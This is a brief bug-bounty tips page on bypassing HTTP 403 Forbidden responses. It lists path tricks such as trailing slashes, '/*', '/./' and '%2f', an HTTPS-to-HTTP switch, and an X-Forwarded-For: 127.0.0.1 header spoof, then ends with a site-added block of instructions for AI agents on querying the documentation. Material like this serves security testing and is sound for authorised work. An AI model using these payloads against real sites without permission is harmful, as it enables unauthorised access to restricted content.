# 403 Bypass
### 403 Bypass
I am sharing all this tips and techniques from my own personal experience there no official references for that
#### Directory Based
If you see directory with no slash at end then do these acts there
```
site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200
```
#### File Base
If you see file without any slash at end then do these acts there
```
site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
```
#### Protocol Base
Well, sound wired but check out the example for better understanding
```
https://site.com/secret => 403
http://site.com/secret => 200
```
### Payloads
```
/
/*
/%2f/
/./
./.
/*/
```
#### Header
```
X-Forwarded-For: 127.0.0.1
```
#### Tools
Here is a Tool I found on twitter.
*
*
### Proof Of Concept
Well Always look for some references or proof of concept if someone sharing any tips so you may confirm you are not wasting your time at all. I have some poc video on my YouTube channel for 403 and other Improper access control bugs with those methods. You can check them
YouTube: [Mehedi Hasan Remon](https://www.youtube.com/channel/UCF_yxU7acxUojiGiOAMafQQ/videos?view_as=subscriber)
Author:[@remonsec](https://twitter.com/remonsec) [@KathanP19](https://twitter.com/KathanP19)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kathan19.gitbook.io/howtohunt/status-code-bypass/403bypass.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.